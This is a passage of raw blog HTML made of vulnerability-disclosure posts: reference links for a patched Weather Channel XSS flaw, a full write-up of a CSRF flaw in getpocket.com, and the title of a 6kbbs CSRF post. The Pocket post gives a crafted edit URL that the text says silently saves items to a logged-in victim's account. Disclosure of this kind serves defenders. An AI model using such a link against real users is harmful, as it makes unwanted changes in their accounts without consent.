<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The Weather Channel has patched this Vulnerability in late November, 2014 (last Week). <span style="line-height: 19.6px; text-align: justify;">"The
Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools,
papers, news, and events of interest to the community. FD differs from
other security lists in its open nature and support for researchers'
right to decide how to disclose their own discovered bugs. The full
disclosure movement has been credited with forcing vendors to better
secure their products and to publicly acknowledge and fix flaws rather
than hide them. Vendor legal intimidation and censorship attempts are
not tolerated here!" A great many of the fllowing web securities have
been published here, Buffer overflow, HTTP Response Splitting (CRLF),
CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF,
Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage,
Denial of Service, File Inclusion, Weak Encryption, Privilege
Escalation, Directory Traversal, HTML Injection, Spam. This bug was
published at The Full Disclosure in November, 2014.</span></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Discovered by:</span></span></div>
</div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (<a href="https://twitter.com/justqdjing/status/558910579193040896">@justqdjing</a>)</span></span></div>
</div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
</div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /><br /><br /><br /><br /><b><br /></b><b>More Details:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/89">http://seclists.org/fulldisclosure/2014/Nov/89</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/3">http://lists.openwall.net/full-disclosure/2014/11/27/3</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-fixes-web-app-flaws-the">http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-flaw</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-exploit</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://diebiyi.com/articles/security/the-weather-channel-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8">http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-flaw</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201411475314523/">http://tetraph.blog.163.com/blog/static/234603051201411475314523/</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://tetraph.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://ithut.tumblr.com/post/121916595448/weather-channel-xss">http://ithut.tumblr.com/post/121916595448/weather-channel-xss</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://computerobsess.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-36309736742818593332015-06-17T01:07:00.000-07:002015-06-17T01:08:26.528-07:00GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability<div style="margin-bottom: 1.3em;">
<div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF1Hv_DxLQJJRT3mPE9OZ60p0DBhA9SN7x8luS5pUgwqhWEH8wenZAtR8ogrXjQN9I6b1motjZcpjlRZP_-TuS3N9vxC4HmdO1qRTDZd3xt0R7ZFiscMYaOUWrujVbZP8TU_DeveOeWb4/s1600/pocket_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF1Hv_DxLQJJRT3mPE9OZ60p0DBhA9SN7x8luS5pUgwqhWEH8wenZAtR8ogrXjQN9I6b1motjZcpjlRZP_-TuS3N9vxC4HmdO1qRTDZd3xt0R7ZFiscMYaOUWrujVbZP8TU_DeveOeWb4/s400/pocket_1.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b><br /></b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b>GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability</b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.2px;"><b>Domain: </b></span><span style="line-height: 19.2px;">getpocket.com</span></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.2px;">"Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. </span><span style="line-height: 19.2px;">The world's leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows." (From: https://getpocket.com/about)</span></span></span></div>
</div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><br /></span></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><br /></span></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><b>Vulnerability Description:</b></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><span style="line-height: 19.6px; text-align: justify;">Pocket</span></span><span style="font-size: small;"><span style="line-height: 19.6px;"> has a computer cyber security bug problem. Hacker can exploit it by CSRF attacks.</span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;"><br /></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;"> "Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application." (OWSAP)</span></span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;">Tests were performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox (37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2),Apple Safari 6.1.6 of Mac OS X v10.9 Mavericks.</span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability Details:</b></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 21px;">The code programming flaw exists at "https://getpocket.com/edit/edit" page, i.e.</span><span style="line-height: 25.2px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></span></div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">Vulnerable URL:</span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 28px;">Use a website created by me for the following tests. The website is "</span><span style="background-color: transparent; line-height: 28px;"><a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a></span><span style="line-height: 28px;">". Suppose that this website is malicious. If it contains the following link, attackers can post any message as they like.</span></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><a href="https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test">getpocket csrf test</a> [1]</span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">When a logged victim clicks the link ([1]), a new item will be successfully saved to his/her "Pocket" without his/her notice. An attack happens.</span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 21px; margin-bottom: 1.3em;">
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><span style="line-height: 25.2px;"><span style="line-height: 25.2px;"><b>Poc Video:</b></span></span><a data-mce-href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" rel="nofollow" style="line-height: 25.2px;">http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be</a></span></span></div>
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Detail:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/">https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/" style="line-height: 28px;">http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html">http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/23460305120143201422975/">http://tetraph.blog.163.com/blog/static/23460305120143201422975/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; line-height: 28px;"><br /></span></span><br />
<div style="background-color: white; line-height: 25.2px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">Discover and Reporter:</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.</span><span style="line-height: 28px;"> (<a href="https://twitter.com/justqdjing/status/558921275054096384">@justqdjing</a>)</span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="-webkit-transition: color 0.3s; font-size: small; line-height: 28px; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-85680954250928331242015-06-14T02:13:00.000-07:002015-06-14T02:13:00.632-07:00CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkR67HVkFOrp5v-MdBNhIXjcBqnUqX9FzKVZ_s9TGH0dvDDzGX40Dy6C4yIvHBmau7WPDJjgAxBXBu8LHkeFVNqbyB0q3i-cFFcIZ7h0CTqY_Fzn_XGK8jA28mOVoFvKErTfBOAp2OKBI/s1600/6kbbs_3.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkR67HVkFOrp5v-MdBNhIXjcBqnUqX9FzKVZ_s9TGH0dvDDzGX40Dy6C4yIvHBmau7WPDJjgAxBXBu8LHkeFVNqbyB0q3i-cFFcIZ7h0CTqY_Fzn_XGK8jA28mOVoFvKErTfBOAp2OKBI/s400/6kbbs_3.png" style="cursor: move;" width="400" /></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
